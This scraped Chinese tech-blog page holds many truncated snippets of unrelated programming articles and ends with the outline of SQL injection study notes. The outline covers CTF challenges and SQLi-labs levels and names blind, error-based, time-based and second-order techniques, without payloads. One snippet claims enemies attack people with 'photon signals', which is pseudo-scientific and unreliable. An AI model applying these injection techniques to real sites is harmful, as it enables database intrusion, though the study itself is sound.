Leetcode面试经典150题刷题记录-系列Leetcod面试经典150题刷题记录——数组/字符串篇Leetcod面试经典150题刷题记录——双指针篇Leetcod面试经典150题刷题记录——矩阵篇Leetcod面试经典150题刷题记录——滑动窗口篇Leetcod面试经典150题刷题记录——哈希表篇Leetcod面试经典150题刷题记录——区间篇Leetcod面试经典150题刷题记录——栈篇Le
《算法竞赛进阶指南》刷题记录「已注销」
总算闲下来一些辣！然后最近发现其实看书是真真很有效但是一直没有落实！所以决定落实一下这段时间把这本书看完题目做完！然后发现还有挺多题目挺巧妙的于是一堆博客预警,,,可能最近会写很多比较水(但是我还是不会做)的题目的题解啊还有就是依然是[]表示没写[X]表示已经写完辣!本来是染色标明要不要写题解的,然而染色太麻烦了QAQ所以就写完题解&&写完代码才会是[X]![X]64位整数乘法快速幂/神仙方法写了
数据采集高并发的架构应用 3golden .net
问题的出发点：最近公司为了发展需要，要扩大对用户的信息采集，每个用户的采集量估计约2W。如果用户量增加的话，将会大量照成采集量成3W倍的增长，但是又要满足日常业务需要，特别是指令要及时得到响应的频率次数远大于预期。 &n
不停止 MySQL 服务增加从库的两种方式 brotherlamp linux linux视频 linux资料 linux教程 linux自学
现在生产环境MySQL数据库是一主一从，由于业务量访问不断增大，故再增加一台从库。前提是不能影响线上业务使用，也就是说不能重启MySQL服务，为了避免出现其他情况，选择在网站访问量低峰期时间段操作。一般在线增加从库有两种方式，一种是通过mysqldump备份主库，恢复到从库，mysqldump是逻辑备份，数据量大时，备份速度会很慢，锁表的时间也会很长。另一种是通过xtrabacku
Quartz——SimpleTrigger触发器 eksliang SimpleTrigger TriggerUtils quartz
转载请出自出处：http://eksliang.iteye.com/blog/2208166 一.概述 SimpleTrigger触发器，当且仅需触发一次或者以固定时间间隔周期触发执行；二.SimpleTrigger的构造函数 SimpleTrigger(String name, String group)：通过该构造函数指定Trigger所属组和名称； Simpl
Informatica应用（1） 18289753290 sql workflow lookup 组件 Informatica
1.如果要在workflow中调用shell脚本有一个command组件，在里面设置shell的路径；调度wf可以右键出现schedule，现在用的是HP的tidal调度wf的执行。 2.designer里面的router类似于SSIS中的broadcast（多播组件）;Reset_Workflow_Var：参数重置（比如说我这个参数初始是1在workflow跑得过程中变成了3我要在结束时还要
python 获取图片验证码中文字酷的飞上天空 python
根据现成的开源项目 http://code.google.com/p/pytesser/改写在window上用easy_install安装不上看了下源码发现代码很少于是就想自己改写一下添加支持网络图片的直接解析 #coding:utf-8 #import sys #reload(sys) #sys.s
AJAX 永夜-极光 Ajax
1.AJAX功能:动态更新页面,减少流量消耗,减轻服务器负担 2.代码结构: <html> <head> <script type="text/javascript"> function loadXMLDoc() { .... AJAX script goes here ...
创业OR读研随便小屋创业
现在研一，有种想创业的想法，不知道该不该去实施。因为对于的我情况这两者是矛盾的，可能就是鱼与熊掌不能兼得。研一的生活刚刚过去两个月，我们学校主要的是
需求做得好与坏直接关系着程序员生活质量 aijuans IT 生活
这个故事还得从去年换工作的事情说起，由于自己不太喜欢第一家公司的环境我选择了换一份工作。去年九月份我入职现在的这家公司，专门从事金融业内软件的开发。十一月份我们整个项目组前往北京做现场开发，从此苦逼的日子开始了。系统背景：五月份就有同事前往甲方了解需求一直到6月份，后续几个月也完
如何定义和区分高级软件开发工程师 aoyouzi
在软件开发领域，高级开发工程师通常是指那些编写代码超过 3 年的人。这些人可能会被放到领导的位置，但经常会产生非常糟糕的结果。Matt Briggs 是一名高级开发工程师兼 Scrum 管理员。他认为，单纯使用年限来划分开发人员存在问题，两个同样具有 10 年开发经验的开发人员可能大不相同。近日，他发表了一篇博文，根据开发者所能发挥的作用划分软件开发工程师的成长阶段。　　初
Servlet的请求与响应百合不是茶 servlet get提交 java处理post提交
Servlet是tomcat中的一个重要组成,也是负责客户端和服务端的中介 1,Http的请求方式(get ,post); 客户端的请求一般都会都是Servlet来接受的,在接收之前怎么来确定是那种方式提交的,以及如何反馈,Servlet中有相应的方法, http的get方式 servlet就是都doGet(
web.xml配置详解之listener bijian1013 java web.xml listener
一.定义 <listener> <listen-class>com.myapp.MyListener</listen-class> </listener> 二.作用该元素用来注册一个监听器类。可以收到事件什么时候发生以及用什么作为响
Web页面性能优化（yahoo技术） Bill_chen JavaScript Ajax Web css Yahoo
1.尽可能的减少HTTP请求数 content 2.使用CDN server 3.添加Expires头(或者 Cache-control) server 4.Gzip 组件 server 5.把CSS样式放在页面的上方。 css 6.将脚本放在底部(包括内联的) javascript 7.避免在CSS中使用Expressions css 8.将javascript和css独立成外部文
【MongoDB学习笔记八】MongoDB游标、分页查询、查询结果排序 bit1129 mongodb
游标游标，简单的说就是一个查询结果的指针。游标作为数据库的一个对象，使用它是包括声明打开循环抓去一定数目的文档直到结果集中的所有文档已经抓取完关闭游标游标的基本用法，类似于JDBC的ResultSet(hasNext判断是否抓去完,next移动游标到下一条文档)，在获取一个文档集时，可以提供一个类似JDBC的FetchSize
ORA-12514 TNS 监听程序当前无法识别连接描述符中请求服务的解决方法白糖_ ORA-12514
今天通过Oracle SQL*Plus连接远端服务器的时候提示“监听程序当前无法识别连接描述符中请求服务”，遂在网上找到了解决方案： ①打开Oracle服务器安装目录\NETWORK\ADMIN\listener.ora文件，你会看到如下信息： # listener.ora Network Configuration File: D:\database\Oracle\net
Eclipse 问题 A resource exists with a different case bozch eclipse
在使用Eclipse进行开发的时候，出现了如下的问题： Description Resource Path Location TypeThe project was not built due to "A resource exists with a different case: '/SeenTaoImp_zhV2/bin/seentao'.&
编程之美-小飞的电梯调度算法 bylijinnan 编程之美
public class AptElevator { /** * 编程之美小飞电梯调度算法 * 在繁忙的时间，每次电梯从一层往上走时，我们只允许电梯停在其中的某一层。 * 所有乘客都从一楼上电梯，到达某层楼后，电梯听下来，所有乘客再从这里爬楼梯到自己的目的层。 * 在一楼时，每个乘客选择自己的目的层，电梯则自动计算出应停的楼层。 * 问：电梯停在哪
SQL注入相关概念 chenbowen00 sql Web 安全
SQL Injection：就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意）的SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。首先让我们了解什么时候可能发生SQ
[光与电]光子信号战防御原理 comsci 原理
无论是在战场上,还是在后方,敌人都有可能用光子信号对人体进行控制和攻击,那么采取什么样的防御方法,最简单,最有效呢? 我们这里有几个山寨的办法,可能有些作用,大家如果有兴趣可以去实验一下根据光
oracle 11g新特性:Pending Statistics daizj oracle dbms_stats
oracle 11g新特性:Pending Statistics 转从11g开始，表与索引的统计信息收集完毕后，可以选择收集的统信息立即发布，也可以选择使新收集的统计信息处于pending状态，待确定处于pending状态的统计信息是安全的，再使处于pending状态的统计信息发布，这样就会避免一些因为收集统计信息立即发布而导致SQL执行计划走错的灾难。在 11g 之前的版本中，D
快速理解RequireJs dengkane jquery requirejs
RequireJs已经流行很久了，我们在项目中也打算使用它。它提供了以下功能：声明不同js文件之间的依赖可以按需、并行、延时载入js库可以让我们的代码以模块化的方式组织初看起来并不复杂。在html中引入requirejs 在HTML中，添加这样的 <script> 标签： <script src="/path/to
C语言学习四流程控制if条件选择、for循环和强制类型转换 dcj3sjt126com c
# include <stdio.h> int main(void) { int i, j; scanf("%d %d", &i, &j); if (i > j) printf("i大于j\n"); else printf("i小于j\n"); retu
dictionary的使用要注意 dcj3sjt126com IO
NSDictionary *dict = [NSDictionary dictionaryWithObjectsAndKeys: user.user_id , @"id", user.username , @"username",
Android 中的资源访问(Resource) finally_m xml android String drawable color
简单的说，Android中的资源是指非代码部分。例如，在我们的Android程序中要使用一些图片来设置界面，要使用一些音频文件来设置铃声，要使用一些动画来显示特效，要使用一些字符串来显示提示信息。那么，这些图片、音频、动画和字符串等叫做Android中的资源文件。在Eclipse创建的工程中，我们可以看到res和assets两个文件夹，是用来保存资源文件的，在assets中保存的一般是原生
Spring使用Cache、整合Ehcache 234390216 spring cache ehcache @Cacheable
Spring使用Cache 从3.1开始，Spring引入了对Cache的支持。其使用方法和原理都类似于Spring对事务管理的支持。Spring Cache是作用在方法上的，其核心思想是这样的：当我们在调用一个缓存方法时会把该方法参数和返回结果作为一个键值对存放在缓存中，等到下次利用同样的
当druid遇上oracle blob(clob) jackyrong oracle
http://blog.csdn.net/renfufei/article/details/44887371 众所周知，Oracle有很多坑, 所以才有了去IOE。在使用Druid做数据库连接池后，其实偶尔也会碰到小坑，这就是使用开源项目所必须去填平的。【如果使用不开源的产品，那就不是坑，而是陷阱了，你都不知道怎么去填坑】用Druid连接池，通过JDBC往Oracle数据库的
easyui datagrid pagination获得分页页码、总页数等信息 ldzyz007
var grid = $('#datagrid'); var options = grid.datagrid('getPager').data("pagination").options; var curr = options.pageNumber; var total = options.total; var max =
浅析awk里的数组 nigelzeng 二维数组 array 数组 awk
awk绝对是文本处理中的神器，它本身也是一门编程语言，还有许多功能本人没有使用到。这篇文章就单单针对awk里的数组来进行讨论，如何利用数组来帮助完成文本分析。有这么一组数据： abcd,91#31#2012-12-31 11:24:00 case_a,136#19#2012-12-31 11:24:00 case_a,136#23#2012-12-31 1
搭建 CentOS 6 服务器(6) - TigerVNC rensanning centos
安装GNOME桌面环境 # yum groupinstall "X Window System" "Desktop" 安装TigerVNC # yum -y install tigervnc-server tigervnc 启动VNC服务 # /etc/init.d/vncserver restart # vncser
Spring 数据库连接整理 tomcat_oracle spring bean jdbc
1、数据库连接jdbc.properties配置详解　　jdbc.url=jdbc:hsqldb:hsql://localhost/xdb 　　jdbc.username=sa 　　jdbc.password= 　　jdbc.driver=不同的数据库厂商驱动，此处不一一列举　　接下来，详细配置代码如下：　　 Spring连接池
Dom4J解析使用xpath java.lang.NoClassDefFoundError: org/jaxen/JaxenException异常 xp9802
用Dom4J解析xml,以前没注意,今天使用dom4j包解析xml时在xpath使用处报错异常栈：java.lang.NoClassDefFoundError: org/jaxen/JaxenException异常导入包 jaxen-1.1-beta-6.jar 解决; &nb

SQL注入学习记录一

前置知识：

0x01:数据库基础

0x02:闭合

0x03:常见注入方法

0x04:文件读写

[BJDCTF 2nd]简单注入

布尔盲注

[SWPU2019]Web1

MariaDB

二次注入

无列名注入

SQLILABS

Less-1

Less-2

Less-3

Less-4

Less-5

使用left()

使用substr()、ascii()

使用regexp()

使用ord()、mid()

使用报错注入

使用延时注入

数据爆破

Less-6

Less-7

Less-8

Less-9

Less-10

Less-11

Less-12

Less-13

报错注入：

Less-14

Less-15

Less-16

Less-17

updatexml函数。

Less-18

Less-19

你可能感兴趣的:(刷题记录)